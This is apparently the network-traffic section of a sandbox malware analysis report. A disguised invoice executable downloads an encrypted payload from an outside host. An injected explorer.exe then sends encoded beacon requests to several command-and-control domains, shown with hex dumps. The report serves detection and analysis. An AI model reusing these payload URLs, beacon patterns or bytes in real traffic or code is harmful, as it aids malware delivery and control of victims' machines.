content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.location.host + '/' + 'IONOSParkingUS'
Dec 1, 2021 10:34:25.756695986 CET	459	IN	Data Raw: 20 20 20 20 20 20 20 20 2b 20 27 2f 70 61 72 6b 2e 6a 73 22 3e 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 3c 5c 2f 73 63 72 69 70 74 3e 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 29 3b 0a 20 20 3c 2f 73 63 72 69 70 Data Ascii: + '/park.js">' + '<\/script>' ); </script> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.11.20	49797	81.2.194.128	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:34:31.911740065 CET	460	OUT	GET /n8ds/?gHl=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&4ha8=4hi0dlyHZliDfr HTTP/1.1 Host: www.growebox.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:34:31.939558983 CET	462	IN	HTTP/1.1 200 OK Date: Wed, 01 Dec 2021 09:34:31 GMT Server: Apache Content-Length: 3011 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 54 68 65 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 69 73 20 72 65 67 69 73 74 65 72 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 30 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 4f 52 50 53 49 20 6a 65 20 45 76 72 6f 70 73 6b e1 20 68 6f 75 73 69 6e 67 6f 76 e1 20 73 70 6f 6c 65 e8 6e 6f 73 74 2e 20 4e 61 62 ed 7a ed 20 73 6c 75 9e 62 79 20 77 65 62 68 6f 73 74 69 6e 67 75 2c 20 73 65 72 76 65 72 68 6f 73 74 69 6e 67 75 2c 20 72 65 67 69 73 74 72 61 63 65 20 64 6f 6d e9 6e 6f 76 fd 63 68 20 6a 6d 65 6e 20 61 20 77 77 77 20 73 74 72 e1 6e 6b 79 20 6e 61 20 73 65 72 76 65 72 65 63 68 20 57 69 6e 64 6f 77 73 2f 4c 69 6e 75 78 2e 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 66 6f 72 70 73 69 2c 77 65 62 68 6f 73 74 69 6e 67 2c 64 6f 6d e9 6e 61 2c 64 6f 6d e9 6e 79 2c 68 6f 73 74 69 6e 67 2c 73 65 72 76 65 72 2c 73 65 72 76 65 72 68 6f 73 74 69 6e 67 2c 68 6f 75 73 69 6e 67 2c 73 65 72 76 65 72 68 6f 75 73 69 6e 67 2c 61 64 73 6c 2c 77 69 66 69 2c 77 69 2d 66 69 2c 64 6f 6d 61 69 6e 2c 64 6f 6d 61 69 6e 73 22 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0d 0a 09 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 32 35 34 39 63 3b 0d 0a 7d 0d 0a 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 7d 0d 0a 23 62 6f 78 20 7b 0d 0a 09 77 69 64 74 68 3a 20 35 32 30 70 78 3b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0d 0a 09 74 6f 70 3a 20 31 36 30 70 78 3b 0d 0a 09 62 6f 72 64 65 72 3a 20 34 70 78 20 73 6f 6c 69 64 20 23 63 63 63 63 63 63 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 69 6d 67 2f 6c 6f 67 6f 5f 66 6f 72 70 73 69 2e 67 69 66 29 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 6c 65 66 74 20 74 6f 70 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0d 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 20 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 09 63 6f 6c 6f 72 3a 20 23 33 38 35 30 36 62 3b 0d 0a 7d 0d 0a 23 62 6f 78 32 20 7b 0d 0a 09 77 69 64 74 68 3a 20 35 32 30 70 78 3b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 09 6d 61 72 67 69 6e 3a 20 Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><title>The domain name is registered</title><meta name="robots" content="noindex, nofollow"><meta http-equiv="Content-Type" content="text/html; charset=windows-1250"><meta name="description" content="FORPSI je Evropsk housingov spolenost. Nabz sluby webhostingu, serverhostingu, registrace domnovch jmen a www strnky na serverech Windows/Linux."><meta name="keywords" content="forpsi,webhosting,domna,domny,hosting,server,serverhosting,housing,serverhousing,adsl,wifi,wi-fi,domain,domains"><style type="text/css">...html, body {margin: 0px;padding: 0px;height: 100%;background-color: #32549c;}#container {height: 100%;width: 100%;text-align: center;}#box {width: 520px;position: relative;margin: 0 auto;top: 160px;border: 4px solid #cccccc;background-color: #FFFFFF;background-image: url(img/logo_forpsi.gif);background-repeat: no-repeat;background-position: left top;padding: 20px;font-family : Verdana, Arial, Helvetica, sans-serif;font-size: 14px;color: #38506b;}#box2 {width: 520px;position: relative;margin:
Dec 1, 2021 10:34:31.939620972 CET	463	IN	Data Raw: 30 20 61 75 74 6f 3b 0d 0a 09 74 6f 70 3a 20 31 36 30 70 78 3b 0d 0a 09 62 6f 72 64 65 72 3a 20 34 70 78 20 73 6f 6c 69 64 20 23 63 63 63 63 63 63 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0d 0a 09 Data Ascii: 0 auto;top: 160px;border: 4px solid #cccccc;background-color: #FFFFFF;padding: 20px;font-family : Verdana, Arial, Helvetica, sans-serif;font-size: 14px;color: #38506b;}#flag {position: absolute;left: 95px;top
Dec 1, 2021 10:34:31.939662933 CET	463	IN	Data Raw: 61 63 75 74 65 3b 4e 41 20 4a 45 20 5a 41 52 45 47 49 53 54 52 4f 56 26 41 61 63 75 74 65 3b 4e 41 3c 2f 74 64 3e 0d 0a 20 20 3c 2f 74 72 3e 0d 0a 20 20 3c 74 72 3e 0d 0a 20 20 20 20 3c 74 64 3e 3c 69 6d 67 20 73 72 63 3d 22 69 6d 67 2f 66 6c 61 Data Ascii: acute;NA JE ZAREGISTROVÁNA</td> </tr> <tr> <td><img src="img/flagSk.png" /></td> <td class="txt">DOMÉNA JE ZAREGISTROVANÁ</td> </tr> <tr> <td><img src="img/flagPol.gif" /></td> <td class="tx

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.11.20	49798	185.61.153.97	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:34:37.005281925 CET	464	OUT	GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1 Host: www.dif-directory.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:34:37.034074068 CET	466	IN	HTTP/1.1 301 Moved Permanently keep-alive: timeout=5, max=100 content-type: text/html content-length: 707 date: Wed, 01 Dec 2021 09:34:37 GMT server: LiteSpeed location: https://www.dif-directory.xyz/n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c x-turbo-charged-by: LiteSpeed x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff strict-transport-security: max-age=31536000; includeSubDomains; preload; referrer-policy: no-referrer-when-downgrade connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.11.20	49799	185.98.5.234	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:34:43.456566095 CET	467	OUT	GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1 Host: www.avto-click.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:34:43.554660082 CET	467	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 01 Dec 2021 09:34:43 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.avto-click.com/n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr Strict-Transport-Security: max-age=31536000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49790	162.241.120.147	443	C:\Users\user\Desktop\draft_inv dec21.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-01 09:32:47 UTC	0	OUT	GET /GHDFR/bin_rOlFDOAa61.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: statuswar.info Cache-Control: no-cache
2021-12-01 09:32:47 UTC	0	IN	HTTP/1.1 200 OK Date: Wed, 01 Dec 2021 09:32:46 GMT Server: Apache Last-Modified: Tue, 30 Nov 2021 23:09:34 GMT Accept-Ranges: bytes Content-Length: 167488 Connection: close Content-Type: application/octet-stream
2021-12-01 09:32:47 UTC	0	IN	Data Raw: ef 47 a8 56 f2 a1 01 5b 45 56 9d a9 82 76 0f a7 05 ed 3d c9 0d bb fe 29 bd b3 7e 85 e0 41 2c 6d 44 05 0c cb 44 1e 75 96 7b 1f ea 21 fe 03 aa 35 1e 2d ef 75 40 c6 05 fd 7b ec df c0 c7 c2 ec 16 5b 77 54 89 d0 be 0f 6a 28 5f 56 66 26 5e d9 cc d1 e2 52 a0 f2 2f 66 11 ae 6f 6f 41 b8 16 32 0a ea 94 f3 1f 07 6a 30 a9 1b ff 0d dc 08 12 db 82 be c3 4e 74 01 b3 65 c1 95 0d 8b 24 b2 c5 6d f7 4b e5 8e 0e d4 b9 c9 4b 9b 7b 70 c6 04 5e 23 21 5c f0 1f 99 7e 8e ef f5 d8 0f 65 3c 02 67 71 8a 38 4d 9b 8b 72 2b 17 4a 5a 72 f7 a2 8e 09 dc 04 d2 73 c0 77 ea 0c 00 d1 4b ca 0d 92 ce 75 6e 42 53 ff e9 6c db 8f 42 ac 92 56 cc 0c 50 0b c3 69 46 96 76 12 a6 98 5c 14 2d 6c 51 bd 66 25 cb 4a aa 5c 79 dd 04 82 e9 d0 1f 14 62 3d 01 37 09 78 81 2d c6 be f2 de 56 a2 e0 f0 b3 bb 39 52 f8 Data Ascii: GV[EVv=)~A,mDDu{!5-u@{[wTj(_Vf&^R/fooA2j0Nte$mKK{p^#!\~e<gq8Mr+JZrswKunBSlBVPiFv\-lQf%J\yb=7x-V9R
2021-12-01 09:32:47 UTC	8	IN	Data Raw: 9a 19 4b d2 62 7b 6b 01 b5 3f 30 71 c3 93 27 79 9b 24 2f 9e 57 c6 a8 8e 39 3e b7 6c 0c c6 d0 f1 fd f2 1d 8d d9 84 4d f7 4d 6a 0e 25 56 cd 61 06 70 f0 0c 4e ca ef e4 48 cc 2f c8 54 1d bc ec 1e df ee 35 4f 95 d7 dd 4e df 51 0f b5 e2 67 5f 06 ab 9d 10 06 14 fb 00 fd 29 af ed ae c8 f2 59 47 d5 01 d0 0f ee a5 af 3c bd ea cb d7 07 d6 ce f1 3a 3f af 60 d6 f3 3c 25 18 c3 74 66 4f da 94 a1 f4 d2 3c 9b 3b fd 46 7c 5f 9c 2c d0 33 97 a1 5f 0b 0c 1c ac 3a f2 61 b9 78 f5 95 db 3e e9 76 f9 4a a1 5d f6 08 16 63 fe c2 d9 ce 31 9d 5c 63 28 c3 19 6c d0 78 3b e4 37 0f a8 81 4a 3a 19 b6 0b 90 9f 6e 0c 5f a9 62 15 50 4f ca a8 ea 13 25 9c 4d a8 e8 67 48 24 ec 67 bd cb a4 0b 1b ce e7 2c f4 f3 fb 31 28 4a 50 b0 e7 d6 5d 1b 9f 29 ca 97 95 07 c5 9e 92 a8 73 52 39 4a ed a0 3e b8 4f Data Ascii: Kb{k?0q'y$/W9>lMMj%VapNH/T5ONQg_)YG<:?`<%tfO<;F\|_,3_:ax>vJ]c1\c(lx;7J:n_bPO%MgH$g,1(JP])sR9J>O
2021-12-01 09:32:47 UTC	15	IN	Data Raw: 61 7c d9 5c 65 fd 77 4f f0 17 5a 0c fd 1e 8a 38 89 67 16 05 58 b9 c4 a1 4f fb 62 57 13 36 77 f0 6f e3 39 1d be b2 21 1e c4 4d 43 a5 3a 2e 8a 39 73 35 40 b7 64 8b 84 3e fc 69 65 d1 2d d1 1b 86 c7 37 19 3b eb ff 4f c6 20 9d a8 08 94 de fd d5 02 ba 22 b9 9b f8 f6 9f 97 36 0f 2c a6 78 5e 3a 2a ba 0d f3 31 20 92 b1 61 70 5c c7 25 38 c6 43 d8 d0 bc 39 7b 26 59 ab 17 5d 60 5c 04 85 b5 17 05 8f a1 a4 48 13 77 31 6d db d5 04 a5 dc 05 f0 73 d8 58 f8 a0 4c 4b df ca bd 31 66 58 18 54 21 be 9f 48 1f cd 15 fa f6 cf 06 cb ce 7a 17 46 28 be f4 7c 0a 84 e0 62 98 ed 77 2f 67 6e c4 e4 4e 8c 29 51 eb 4b d8 91 3c e4 ca 9e 5b 83 89 6e dd 29 44 3d 0f 1b 4b 60 b6 87 86 fd b4 b7 d1 9a 05 1f f4 60 b2 3a 28 eb 15 37 4e 8a 3b ad d8 85 bb 86 fe c4 53 08 96 7c 8b 11 7a d6 f5 68 1e f3 Data Ascii: a\|\ewOZ8gXObW6wo9!MC:.9s5@d>ie-7;O "6,x^:*1 ap\%8C9{&Y]`\Hw1msXLK1fXT!HzF(\|bw/gnN)QK<[n)D=K``:(7N;S\|zh
2021-12-01 09:32:47 UTC	23	IN	Data Raw: 44 9d dd 2d 13 38 96 e7 aa 1b 8a 2a 43 1b 4c 9f 80 92 8b e5 23 c3 df 28 8a f0 27 9a 65 31 c1 7a cb 54 38 96 95 53 63 f8 88 01 6d 4d 90 39 7b 32 c2 66 0d 00 b1 08 1b 2b f1 19 2a 12 76 ae 33 1e af 24 da 35 db 2e 27 da 09 40 4d f3 2d 78 62 40 5c 02 fd 78 7d 1e 68 71 2f a4 b2 23 cd 81 b2 a7 4b ae 1a c6 96 38 1f 0a 96 14 c4 e3 30 12 ef af d9 40 ac 9b 77 a2 f7 30 4c e3 fa 51 22 d3 72 c7 70 f2 58 21 8f fc f6 81 91 89 98 db 38 bf 0f 6a 28 58 5e 6b 72 16 22 b0 46 b4 c0 f3 a7 06 a8 0d 86 6c e4 7a 49 03 f2 7e b9 fe b3 92 4a da 67 f8 f3 d5 4e dd 08 99 4d 22 b5 c3 4e 1c aa 92 64 6c a6 cd dc 73 83 80 99 7e 00 02 bd 45 28 5f 4d c0 a6 93 f8 f7 39 b8 32 e5 71 83 3f e9 e4 ef 68 87 b9 e1 81 7f 58 ce 6b f1 1b e0 b4 1e 03 d4 37 88 28 4c ce d5 9d 11 d8 73 ec 4b 5b c2 4d bf 61 Data Ascii: D-8CL#('e1zT8ScmM9{2f+v3$5.'@M-xb@\x}hq/#K80@w0LQ"rpX!8j(X^kr"FlzI~JgNM"Ndls~E(_M92q?hXk7(LsK[Ma
2021-12-01 09:32:47 UTC	31	IN	Data Raw: f7 b0 61 1a 64 68 52 d8 e7 84 0c e0 56 5e 0a e9 39 40 1c 49 e4 5c 9b 84 0c 73 e0 8a 5a a7 7b d2 84 95 6e 08 6c e4 33 62 ea 89 a9 b0 a0 33 c2 22 8f 8d e8 0f 4e 6a e5 08 13 01 17 17 f3 a9 8e 57 71 62 b2 f7 79 0b 4c 10 4a 03 0d 18 d9 b0 b6 07 37 b9 fe f1 8a 90 7e 2f f1 b7 75 40 58 0b 34 f7 46 4f 7e b7 5a 9c 10 9e 64 70 73 ab 72 02 04 00 3e 58 a5 50 80 3f 08 65 7c 0c 09 eb af 60 12 4b 59 ee 2a 59 77 02 0c 89 77 6b 80 f7 92 8f 5b dd 8e 24 3d 1a 96 49 16 a2 e7 87 f6 f6 a1 94 ae d7 48 da 25 8a 99 e3 3f 04 ce c3 05 06 8d 0a f2 00 1d 42 7f e3 d0 83 66 da 08 33 ed fd f8 78 97 ec b8 78 5a 0b 6e 36 53 59 bf c0 a0 5d 8a 7f 86 76 40 b1 a2 4d 30 0a a7 51 39 d2 69 43 3a db c4 1b 45 31 c5 12 67 02 cc bf 78 db 9e e1 2a d7 e8 69 b9 d9 b1 b6 93 73 10 3e 2f 74 d2 9b cb dd a7 Data Ascii: adhRV^9@I\sZ{nl3b3"NjWqbyLJ7~/u@X4FO~Zdpsr>XP?e\|`KYYwwk[$=IH%?Bf3xxZn6SY]v@M0Q9iC:E1gxis>/t
2021-12-01 09:32:47 UTC	39	IN	Data Raw: 91 f0 2b 3a 82 c9 df a8 8f f9 bc ce 11 6e 85 6b 61 ba 77 8e 88 75 67 91 71 e8 5d ec cc e6 2d 02 8f b6 7a a6 99 8e b6 0d be eb 01 d1 2e 9a 31 5a a0 3c 81 05 0e fe 9c c0 39 00 ab 0a eb 63 76 85 5f f5 b1 45 d6 d5 4a b2 36 4a 95 00 57 4a d5 0d 5e a7 8e 1f 58 78 f7 45 78 e6 b4 22 e6 0d ca 47 6e 55 2f 61 d1 94 a2 1a 86 c7 37 25 bd eb ec c0 9f fa cd 38 7a dc 05 6c cf f1 c8 90 1e 98 42 2b b1 91 37 0c 67 b8 f1 56 5e 92 c6 36 a7 8b 8e 93 b5 60 fd 9a 5d 70 e1 6b 9c 52 4e 18 3e bf 36 b2 9f 15 d5 66 53 d7 8b e2 a0 0b a4 f8 21 96 71 71 52 62 34 91 08 ab b4 2d d1 37 ad 5c 23 2f 31 01 f2 c6 37 74 8a 62 85 9c 97 f2 27 39 e4 eb 71 70 b3 b5 85 82 8f 77 86 61 f2 3d 91 6d 0a 0f e5 e7 56 d9 66 ad 64 2f 48 62 59 ca 21 dc ee 53 5c 7d 78 1c 19 30 57 51 df 5e 34 29 44 0e b2 81 e5 Data Ascii: +:nkawugq]-z.1Z<9cv_EJ6JWJ^XxEx"GnU/a7%8zlB+7gV^6`]pkRN>6fS!qqRb4-7\#/17tb'9qpwa=mVfd/HbY!S\}x0WQ^4)D
2021-12-01 09:32:47 UTC	47	IN	Data Raw: 62 47 87 66 48 58 8f e3 7e 92 62 03 1e 30 e4 2c bd 02 6f 4e 07 b9 2c 4e 18 aa bb 01 0c 91 48 12 f1 06 c5 31 56 c7 b1 a4 01 30 fc d3 c1 bb 90 e2 cb 4e c2 dd 46 1a 51 4d 5f 33 52 65 19 dc 3c 35 9d 31 2c cf bd 86 9d b3 8f 27 53 ad 96 66 28 45 aa 05 44 e6 62 ee d1 80 4f f2 99 8e c4 06 f2 8b 24 7a 1f ef 12 76 23 e8 95 26 d3 4f 64 59 26 9c 8c e1 e1 51 a3 a6 7d fe 5b d9 c2 05 af f0 65 fb d7 5d f4 d3 b2 48 8a b2 24 04 f9 6d 29 c1 b1 99 6e c3 9f 21 56 bc 84 1d dd df 84 58 e1 48 87 be 8f d0 e9 64 55 50 a1 f1 ff 87 88 c9 bc 40 45 ad 46 ac 71 11 db 38 d8 86 fe 6d 07 29 71 d0 58 94 4f ed 21 26 f0 19 2b 02 d1 86 e1 eb fb 59 7a cd f5 bb c2 1b 58 f0 95 cf 2a df df 88 1c 07 97 fe 7d 41 3c 10 ff e4 ee a6 ab 94 67 80 73 5c 2d 11 15 ba 05 5c 1f d6 0f c0 0b 37 c3 8d 75 36 2e Data Ascii: bGfHX~b0,oN,NH1V0NFQM_3Re<51,'Sf(EDbO$zv#&OdY&Q}[e]H$m)n!VXHdUP@EFq8m)qXO!&+YzX*}A<gs\-\7u6.
2021-12-01 09:32:47 UTC	55	IN	Data Raw: ad c8 3d 7b 02 49 4b 6a 3a da 68 4b 22 80 99 91 b0 26 02 b2 3a ab c7 b5 db 09 ce 3d a9 a0 9d 30 4e a7 e5 c1 2f 7b 50 a8 14 91 bb 5a a3 9f c3 83 8a b1 67 8a 19 18 f2 5a 8c cc be 4d 8e 61 aa 83 01 cc 94 7c 3e 5b a7 f6 a5 13 c9 6f 08 86 0e cf aa ea a2 e4 74 7d 2b 59 2e 78 72 ba 5f dd d4 90 48 1f fd be 65 5e fb 68 00 99 90 7a ff fc 9d 14 7c c5 c7 0d 18 05 55 86 80 72 05 c5 a6 32 ea fe 97 f1 34 b1 78 eb 6a a8 f7 46 c2 33 51 5a a8 1f d0 ba 23 bc 94 d3 d9 b7 d4 73 22 bf 7f 23 03 58 13 6f 72 8f 2f fb ed ac 01 60 2e 42 4f 51 37 0d d9 73 e1 2a ea 75 71 0a 36 4a a9 2c b0 3f 3f bb b1 c9 c5 c0 c4 61 7d 5c ab 2d fd 77 74 66 97 96 4e 1e 73 a8 af 9a ea 02 9a e2 06 3e af aa bc 96 26 a0 56 ed 9b fc 78 3f ea b8 78 e2 69 e6 c6 02 82 b5 58 71 f3 84 ee 1c a9 12 40 dc 92 cf 24 Data Ascii: ={IKj:hK"&:=0N/{PZgZMa\|>[ot}+Y.xr_He^hz\|Ur24xjF3QZ#s"#Xor/`.BOQ7s*uq6J,??a}\-wtfNs>&Vx?xiXq@$
